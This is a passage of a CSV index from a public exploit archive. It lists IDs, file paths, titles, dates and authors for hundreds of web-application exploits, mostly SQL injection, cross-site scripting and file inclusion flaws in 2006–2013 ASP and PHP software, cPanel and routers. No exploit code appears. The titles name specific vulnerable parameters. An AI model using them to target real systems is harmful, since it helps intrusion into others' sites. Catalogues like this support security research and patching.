- '/fisheye/list_galleries.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php, +28956,exploits/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,webapps,php,80 +28959,exploits/php/webapps/28959.txt,"WordPress Plugin Cart66 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,webapps,php,80 +28960,exploits/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,webapps,php,80 +29086,exploits/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' SQL Injection (1)",2006-11-18,"laurent gaffie",webapps,asp, +28963,exploits/php/webapps/28963.txt,"Bitweaver 1.x - '/fisheye/index.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php, +28964,exploits/php/webapps/28964.txt,"Bitweaver 1.x - '/wiki/orphan_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php, +28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php, +28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,webapps,php, +28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80 +28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80 +28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",webapps,unix, +28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios, +28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios, +28977,exploits/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios, +28978,exploits/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass",2013-10-15,Vulnerability-Lab,webapps,ios, +28979,exploits/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,linux, +28980,exploits/php/webapps/28980.txt,"WordPress 2.0.5 - 'functions.php' Remote File Inclusion",2006-11-11,_ANtrAX_,webapps,php, +28982,exploits/php/webapps/28982.txt,"cPanel 10 - 'seldir.html?dir' Cross-Site Scripting",2006-11-13,"Aria-Security Team",webapps,php, +28983,exploits/php/webapps/28983.txt,"cPanel 10 - 'newuser.html' Multiple Cross-Site Scripting Vulnerabilities",2006-11-13,"Aria-Security Team",webapps,php, +28985,exploits/asp/webapps/28985.txt,"20/20 Real Estate 3.2 - 'listings.asp' SQL Injection",2006-11-14,"Aria-Security Team",webapps,asp, +28986,exploits/asp/webapps/28986.asp,"ASP Portal 2.0/3.x/4.0 - 'Default1.asp' SQL Injection",2006-11-13,ajann,webapps,asp, +28988,exploits/php/webapps/28988.txt,"Roundcube Webmail 0.1 - 'index.php' Cross-Site Scripting",2006-11-13,RSnake,webapps,php, +28989,exploits/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp, +28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp, +28991,exploits/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-13,"laurent gaffie",webapps,asp, +28992,exploits/asp/webapps/28992.txt,"INFINICART - 'browse_group.asp?groupid' SQL Injection",2006-11-13,"laurent gaffie",webapps,asp, +40373,exploits/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +28993,exploits/asp/webapps/28993.txt,"INFINICART - 'added_to_cart.asp?ProductID' SQL Injection",2006-11-13,"laurent gaffie",webapps,asp, +28994,exploits/asp/webapps/28994.txt,"INFINICART - 'browsesubcat.asp' Multiple SQL Injections",2006-11-13,"laurent gaffie",webapps,asp, +28995,exploits/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,webapps,php,80 +29151,exploits/asp/webapps/29151.txt,"Link Exchange Lite 1.0 - Multiple SQL Injections",2006-11-21,"laurent gaffie",webapps,asp, +29152,exploits/asp/webapps/29152.txt,"JiRos Link Manager 1.0 - 'openlink.asp?LinkID' SQL Injection",2006-11-21,"laurent gaffie",webapps,asp, +29153,exploits/asp/webapps/29153.txt,"JiRos Link Manager 1.0 - 'viewlinks.asp?categoryId' SQL Injection",2006-11-21,"laurent gaffie",webapps,asp, +29154,exploits/asp/webapps/29154.txt,"CreaDirectory 1.2 - 'search.asp?category' SQL Injection",2006-11-21,"laurent gaffie",webapps,asp, +29155,exploits/asp/webapps/29155.txt,"CreaDirectory 1.2 - 'addlisting.asp?cat' Cross-Site Scripting",2006-11-21,"laurent gaffie",webapps,asp, +28998,exploits/php/webapps/28998.txt,"PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion",2006-11-12,Firewall,webapps,php, +28999,exploits/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",webapps,php, +29000,exploits/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",webapps,php, +29001,exploits/php/webapps/29001.txt,"DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting",2006-11-12,"Aria-Security Team",webapps,php, +29002,exploits/php/webapps/29002.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting",2006-11-12,"Aria-Security Team",webapps,php, +29003,exploits/php/webapps/29003.txt,"DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting",2006-11-12,"Aria-Security Team",webapps,php, +29004,exploits/php/webapps/29004.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting",2006-11-12,"Aria-Security Team",webapps,php, +29005,exploits/php/webapps/29005.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting",2006-11-12,"Aria-Security Team",webapps,php, +29006,exploits/php/webapps/29006.txt,"DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting",2006-11-12,"Aria-Security Team",webapps,php, +29008,exploits/asp/webapps/29008.txt,"FunkyASP Glossary 1.0 - 'Glossary.asp' SQL Injection",2006-11-14,saps.audit,webapps,asp, +29009,exploits/asp/webapps/29009.txt,"SitesOutlet eCommerce Kit - Multiple SQL Injections",2006-11-15,"laurent gaffie",webapps,asp, +29010,exploits/asp/webapps/29010.txt,"SiteXpress E-Commerce System - 'Dept.asp' SQL Injection",2006-11-14,"Aria-Security Team",webapps,asp, +29011,exploits/asp/webapps/29011.txt,"ASPIntranet 2.1 - 'default.asp' SQL Injection",2006-11-14,"Aria-Security Team",webapps,asp, +29012,exploits/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - 'index.asp' SQL Injection",2006-11-14,"Aria-Security Team",webapps,asp, +29013,exploits/asp/webapps/29013.txt,"Pilot Cart 7.2 - 'Pilot.asp' SQL Injection",2006-11-14,"laurent gaffie",webapps,asp, +29014,exploits/asp/webapps/29014.txt,"Car Site Manager - '/csm/asp/listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",webapps,asp, +29015,exploits/asp/webapps/29015.txt,"Car Site Manager - '/csm/asp/detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",webapps,asp, +29016,exploits/asp/webapps/29016.txt,"Car Site Manager - '/csm/asp/listings.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-14,"laurent gaffie",webapps,asp, +29017,exploits/php/webapps/29017.txt,"Plesk 7.5/8.0 - 'get_password.php' Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",webapps,php, +29018,exploits/php/webapps/29018.txt,"Plesk 7.5/8.0 - 'login_up.php3' Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",webapps,php, +29019,exploits/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,webapps,php, +29020,exploits/php/webapps/29020.txt,"WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,webapps,php,80 +29021,exploits/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,webapps,php,80 +29023,exploits/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",webapps,php, +29024,exploits/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",webapps,asp, +29025,exploits/asp/webapps/29025.txt,"Evolve Merchant - 'viewcart.asp' SQL Injection",2006-11-14,"laurent gaffie",webapps,asp, +29026,exploits/php/webapps/29026.txt,"Mega Mall - 'product_review.php' Multiple SQL Injections",2006-11-14,"laurent gaffie",webapps,php, +29027,exploits/php/webapps/29027.txt,"Mega Mall - 'order-track.php?orderNo' SQL Injection",2006-11-14,"laurent gaffie",webapps,php, +29028,exploits/asp/webapps/29028.txt,"MGinternet Property Site Manager - 'listings.asp?s' Cross-Site Scripting",2006-11-14,"laurent gaffie",webapps,asp, +29029,exploits/asp/webapps/29029.txt,"MGinternet Property Site Manager - 'detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",webapps,asp, +29030,exploits/asp/webapps/29030.txt,"MGinternet Property Site Manager - 'listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",webapps,asp, +29031,exploits/asp/webapps/29031.txt,"MGinternet Property Site Manager - 'admin_login.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",webapps,asp, +29034,exploits/multiple/webapps/29034.txt,"Elite Graphix ElitCMS 1.01 / PRO - Multiple Web Vulnerabilities",2013-10-18,Vulnerability-Lab,webapps,multiple, +29037,exploits/asp/webapps/29037.txt,"CandyPress Store 3.5.2 14 - 'openPolicy.asp?policy' SQL Injection",2006-11-15,"laurent gaffie",webapps,asp, +29038,exploits/asp/webapps/29038.txt,"CandyPress Store 3.5.2 14 - 'prodList.asp?brand' SQL Injection",2006-11-15,"laurent gaffie",webapps,asp, +29040,exploits/asp/webapps/29040.txt,"High Performance Computers Solutions Shopping Cart - Multiple SQL Injections",2006-11-14,"laurent gaffie",webapps,asp, +29041,exploits/asp/webapps/29041.txt,"Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-15,"Aria-Security Team",webapps,asp, +29042,exploits/asp/webapps/29042.txt,"Dragon Internet Events Listing 2.0.01 - 'venue_detail.asp?VenueID' SQL Injection",2006-11-15,"Benjamin Moss",webapps,asp, +29043,exploits/asp/webapps/29043.txt,"Dragon Internet Events Listing 2.0.01 - 'event_searchdetail.asp?ID' SQL Injection",2006-11-15,"Benjamin Moss",webapps,asp, +29044,exploits/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 - 'admin_login.asp' Multiple Field SQL Injections",2006-11-15,"Benjamin Moss",webapps,asp, +29046,exploits/asp/webapps/29046.txt,"ASPIntranet 2.1 - Multiple SQL Injections",2006-11-15,"Aria-Security Team",webapps,asp, +29047,exploits/php/webapps/29047.txt,"Hot Links - Perl PHP Information Disclosure",2006-11-15,hack2prison,webapps,php, +29048,exploits/asp/webapps/29048.txt,"i-Gallery 3.4 - 'igallery.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"Aria-Security Team",webapps,asp, +29049,exploits/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - 'Announce.php' Cross-Site Scripting",2006-11-16,the_Edit0r,webapps,php, +29050,exploits/php/webapps/29050.txt,"Odysseus Blog 1.0 - 'blog.php' Cross-Site Scripting",2006-11-16,the_Edit0r,webapps,php, +29051,exploits/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,webapps,php, +41035,exploits/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",webapps,php, +29053,exploits/asp/webapps/29053.txt,"Image Gallery with Access Database - 'dispimage.asp?id' SQL Injection",2006-11-16,"Aria-Security Team",webapps,asp, +29054,exploits/asp/webapps/29054.txt,"Image Gallery with Access Database - 'default.asp' Multiple SQL Injections",2006-11-16,"Aria-Security Team",webapps,asp, +29058,exploits/php/webapps/29058.txt,"phpMyAdmin 2.x - 'db_create.php?db' Cross-Site Scripting",2006-09-15,"laurent gaffie",webapps,php, +29059,exploits/php/webapps/29059.txt,"phpMyAdmin 2.x - 'db_operations.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"laurent gaffie",webapps,php, +29060,exploits/php/webapps/29060.txt,"phpMyAdmin 2.x - 'querywindow.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"laurent gaffie",webapps,php, +29061,exploits/php/webapps/29061.txt,"phpMyAdmin 2.x - 'sql.php?pos' Cross-Site Scripting",2006-09-15,"laurent gaffie",webapps,php, +29062,exploits/php/webapps/29062.txt,"phpMyAdmin 2.x - Multiple Script Array Handling Full Path Disclosures",2006-09-15,"laurent gaffie",webapps,php, +29063,exploits/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 - 'displaypic.asp?sortorder' SQL Injection",2006-11-16,"Aria-Security Team",webapps,asp, +29064,exploits/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 - 'displaypic.asp?catname' Cross-Site Scripting",2006-11-16,"Aria-Security Team",webapps,asp, +29065,exploits/php/webapps/29065.txt,"WHMCompleteSolution (WHMCS) 5.2.8 - SQL Injection",2013-10-19,g00n,webapps,php, +29150,exploits/php/webapps/29150.txt,"WordPress Theme SAICO 1.0 < 1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",webapps,php, +29221,exploits/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",webapps,cgi, +29222,exploits/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - 'Spellwin.php' Cross-Site Scripting",2006-12-04,"En Douli",webapps,php, +29068,exploits/php/webapps/29068.txt,"WordPress Theme Area53 - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",webapps,php,80 +29071,exploits/php/webapps/29071.txt,"cPanel 10 - DNSlook.HTML Cross-Site Scripting",2006-11-17,"Aria-Security Team",webapps,php, +29072,exploits/php/webapps/29072.txt,"PHP Upload Tool 1.0 - Arbitrary File Upload / Directory Traversal",2006-11-17,"Craig Heffner",webapps,php, +29073,exploits/asp/webapps/29073.txt,"ASPCart 4.5 - Multiple SQL Injections",2006-11-17,"laurent gaffie",webapps,asp, +29074,exploits/asp/webapps/29074.txt,"20/20 Real Estate 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",webapps,asp, +29075,exploits/asp/webapps/29075.txt,"20/20 Auto Gallery 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",webapps,asp, +29077,exploits/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 - 'f-email.asp?itemID' SQL Injection",2006-11-17,"laurent gaffie",webapps,asp, +29078,exploits/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple SQL Injections",2006-11-17,"laurent gaffie",webapps,asp, +29079,exploits/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,webapps,php, +29080,exploits/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injections",2006-11-17,"laurent gaffie",webapps,asp, +29081,exploits/asp/webapps/29081.txt,"BestWebApp Dating Site - 'login_form.asp?msg' Cross-Site Scripting",2006-11-17,"laurent gaffie",webapps,asp, +29085,exploits/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - 'category.asp?catcode' SQL Injection (1)",2006-11-18,"laurent gaffie",webapps,asp, +29084,exploits/asp/webapps/29084.txt,"A-Cart Pro 2.0 - 'product.asp?ProductID' SQL Injection",2006-11-18,"laurent gaffie",webapps,asp, +29087,exploits/asp/webapps/29087.txt,"ActiveNews Manager - 'page' SQL Injection",2006-11-18,"laurent gaffie",webapps,asp, +29088,exploits/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Cross-Site Scripting",2006-11-18,"laurent gaffie",webapps,asp, +29089,exploits/asp/webapps/29089.txt,"Active News Manager - 'catID' SQL Injection",2006-11-18,"laurent gaffie",webapps,asp, +29090,exploits/asp/webapps/29090.txt,"ActiveNews Manager - 'articleId' SQL Injection (2)",2006-11-18,"laurent gaffie",webapps,asp, +29091,exploits/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution",2013-10-20,"Halim Cruzito",webapps,php, +29156,exploits/asp/webapps/29156.txt,"CreaDirectory 1.2 - 'search.asp?search' Cross-Site Scripting",2006-11-21,"laurent gaffie",webapps,asp, +29211,exploits/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",webapps,php, +29118,exploits/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29093,exploits/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' SQL Injection",2006-11-18,"Aria-Security Team",webapps,asp, +29094,exploits/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' SQL Injection",2006-11-18,"Aria-Security Team",webapps,asp, +29095,exploits/php/webapps/29095.txt,"Blog:CMS 4.1.3 - 'list.php' Cross-Site Scripting",2006-11-18,Katatafish,webapps,php, +40372,exploits/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +29097,exploits/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,webapps,php, +29098,exploits/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php?msg' Cross-Site Scripting",2006-11-20,the_Edit0r,webapps,php, +29099,exploits/php/webapps/29099.txt,"BirdBlog 1.4 - '/admin/comments.php?month' Cross-Site Scripting",2006-11-20,the_Edit0r,webapps,php, +29100,exploits/php/webapps/29100.txt,"BirdBlog 1.4 - '/admin/entries.php?month' Cross-Site Scripting",2006-11-20,the_Edit0r,webapps,php, +29101,exploits/php/webapps/29101.txt,"BirdBlog 1.4 - '/admin/logs.php?page' Cross-Site Scripting",2006-11-20,the_Edit0r,webapps,php, +29103,exploits/asp/webapps/29103.txt,"vSpin Classified System 2004 - 'cat.asp?cat' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29104,exploits/asp/webapps/29104.txt,"vSpin Classified System 2004 - 'search.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29105,exploits/asp/webapps/29105.txt,"vSpin Classified System 2004 - 'cat.asp?catname' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29106,exploits/asp/webapps/29106.txt,"vSpin Classified System 2004 - 'search.asp?minprice' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29107,exploits/asp/webapps/29107.txt,"Grandora Rialto 1.6 - '/admin/default.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29108,exploits/asp/webapps/29108.txt,"Grandora Rialto 1.6 - 'listfull.asp?ID' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29109,exploits/asp/webapps/29109.txt,"Grandora Rialto 1.6 - 'listmain.asp?cat' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29110,exploits/asp/webapps/29110.txt,"Grandora Rialto 1.6 - 'printmain.asp?ID' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29111,exploits/asp/webapps/29111.txt,"Grandora Rialto 1.6 - 'searchkey.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29112,exploits/asp/webapps/29112.txt,"Grandora Rialto 1.6 - 'searchmain.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29113,exploits/asp/webapps/29113.txt,"Grandora Rialto 1.6 - 'searchoption.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29114,exploits/asp/webapps/29114.txt,"Grandora Rialto 1.6 - 'listmain.asp?cat' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29115,exploits/asp/webapps/29115.txt,"Grandora Rialto 1.6 - 'searchkey.asp?Keyword' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29116,exploits/asp/webapps/29116.txt,"Grandora Rialto 1.6 - 'searchmain.asp?cat' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29117,exploits/asp/webapps/29117.txt,"Grandora Rialto 1.6 - 'forminfo.asp?refno' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29119,exploits/asp/webapps/29119.txt,"Enthrallweb eClassifieds - 'dircat.asp?cid' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29120,exploits/asp/webapps/29120.txt,"Enthrallweb eClassifieds - 'dirSub.asp?sid' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29121,exploits/asp/webapps/29121.txt,"Enthrallweb eHomes - 'homeDetail.asp?AD_ID' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29122,exploits/asp/webapps/29122.txt,"Enthrallweb eHomes - 'compareHomes.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29123,exploits/asp/webapps/29123.txt,"Enthrallweb eHomes - 'result.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29124,exploits/asp/webapps/29124.txt,"Enthrallweb eHomes - 'result.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-20,"laurent gaffie",webapps,asp, +29126,exploits/asp/webapps/29126.txt,"Gnews Publisher - Multiple SQL Injections",2006-11-20,"Aria-Security Team",webapps,asp, +29128,exploits/php/webapps/29128.txt,"Vikingboard 0.1.2 - 'admin.php?act' Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",webapps,php, +29131,exploits/hardware/webapps/29131.rb,"ARRIS DG860A - NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",webapps,hardware,80 +29133,exploits/asp/webapps/29133.txt,"Rapid Classified 3.1 - 'viewad.asp' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29134,exploits/asp/webapps/29134.txt,"Rapid Classified 3.1 - 'view_print.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29135,exploits/asp/webapps/29135.txt,"Rapid Classified 3.1 - 'search.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29136,exploits/asp/webapps/29136.txt,"Rapid Classified 3.1 - 'reply.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29137,exploits/asp/webapps/29137.txt,"Rapid Classified 3.1 - 'advsearch.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",webapps,asp, +29157,exploits/php/webapps/29157.txt,"Seditio 1.10 - 'Users.Profile.Inc.php' SQL Injection",2006-11-21,"Mustafa Can Bjorn",webapps,php, +29158,exploits/php/webapps/29158.txt,"CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting",2006-11-21,"Alireza Hassani",webapps,php, +29159,exploits/php/webapps/29159.txt,"CuteNews 1.4.5 - 'rss_title' Cross-Site Scripting",2006-11-21,"Alireza Hassani",webapps,php, +29141,exploits/asp/webapps/29141.txt,"The Classified Ad System 3.0 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-20,"laurent gaffie",webapps,asp, +29142,exploits/asp/webapps/29142.txt,"Klf-Realty 2.0 - 'search_listing.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp, +29143,exploits/asp/webapps/29143.txt,"Klf-Realty 2.0 - 'detail.asp?property_id' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp, +29145,exploits/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - 'Dir' Directory Traversal",2006-11-20,the_Edit0r,webapps,php, +29162,exploits/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - 'Weblog.php' Cross-Site Scripting",2006-11-21,the_Edit0r,webapps,php, +29217,exploits/php/webapps/29217.txt,"CuteNews 1.3.6 - 'result' Cross-Site Scripting",2006-12-02,Detefix,webapps,php, +29218,exploits/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,webapps,php, +29219,exploits/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - 'detail.asp' Multiple SQL Injections",2006-12-02,"Aria-Security Team",webapps,asp, +29220,exploits/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - 'Sistemi Uye_giris_islem.asp' SQL Injection",2006-12-04,ShaFuck31,webapps,asp, +29165,exploits/php/webapps/29165.txt,"PMOS Help Desk 2.3 - 'ticketview.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-22,SwEET-DeViL,webapps,php, +29166,exploits/php/webapps/29166.txt,"PMOS Help Desk 2.3 - 'ticket.php?email' Cross-Site Scripting",2006-11-22,SwEET-DeViL,webapps,php, +29992,exploits/php/webapps/29992.txt,"Campsite 2.6.1 - 'SubscriptionSection.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29993,exploits/php/webapps/29993.txt,"Campsite 2.6.1 - 'SystemPref.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29216,exploits/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - 'giris.asp' Multiple Field SQL Injections",2006-12-01,ShaFuq31,webapps,asp, +29173,exploits/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusions",2006-11-23,ThE-LoRd-Of-CrAcKiNg,webapps,php, +29174,exploits/asp/webapps/29174.txt,"MidiCart ASP - 'Item_Show.asp?ID2006quant' SQL Injection",2006-11-24,"Aria-Security Team",webapps,asp, +29175,exploits/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - 'System SP_Index.php' Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",webapps,php, +29176,exploits/asp/webapps/29176.txt,"ASP ListPics 5.0 - 'Listpics.asp' SQL Injection",2006-11-24,"Aria-Security Team",webapps,asp, +29177,exploits/php/webapps/29177.txt,"MMGallery 1.55 - 'Thumbs.php' Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",webapps,php, +29178,exploits/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery - 'filelist.asp' Multiple SQL Injections",2006-11-24,"Aria-Security Team",webapps,asp, +29179,exploits/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery - 'showfile.asp?fid' SQL Injection",2006-11-24,"Aria-Security Team",webapps,asp, +29180,exploits/asp/webapps/29180.txt,"SIAP CMS - 'login.asp' SQL Injection",2006-11-25,nagazakig74,webapps,asp, +29181,exploits/php/webapps/29181.txt,"cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",webapps,php, +29182,exploits/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 - 'dochangeemail?email' Cross-Site Scripting",2006-11-25,"Aria-Security Team",webapps,php, +29183,exploits/php/webapps/29183.txt,"cPanel WebHost Manager 3.1 - 'addon_configsupport.cgi?supporturl' Cross-Site Scripting",2006-11-25,"Aria-Security Team",webapps,php, +29184,exploits/php/webapps/29184.txt,"cPanel WebHost Manager 3.1 - 'editpkg?pkg' Cross-Site Scripting",2006-11-25,"Aria-Security Team",webapps,php, +29185,exploits/php/webapps/29185.txt,"cPanel WebHost Manager 3.1 - 'domts2?domain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",webapps,php, +29186,exploits/php/webapps/29186.txt,"cPanel WebHost Manager 3.1 - 'editzone?domain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",webapps,php, +29187,exploits/php/webapps/29187.txt,"cPanel WebHost Manager 3.1 - 'dofeaturemanager?feature' Cross-Site Scripting",2006-11-25,"Aria-Security Team",webapps,php, +29188,exploits/php/webapps/29188.txt,"cPanel WebHost Manager 3.1 - 'park?ndomain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",webapps,php, +29189,exploits/asp/webapps/29189.txt,"fipsShop - Multiple SQL Injections",2006-11-25,"Aria-Security Team",webapps,asp, +29191,exploits/asp/webapps/29191.txt,"ClickContact - 'default.asp' Multiple SQL Injections",2006-11-27,"Aria-Security Team",webapps,asp, +29192,exploits/asp/webapps/29192.txt,"Clickblog - 'Displaycalendar.asp' SQL Injection",2006-11-27,"Aria-Security Team",webapps,asp, +29193,exploits/asp/webapps/29193.txt,"Click Gallery - Multiple Input Validation Vulnerabilities",2006-11-27,"Aria-Security Team",webapps,asp, 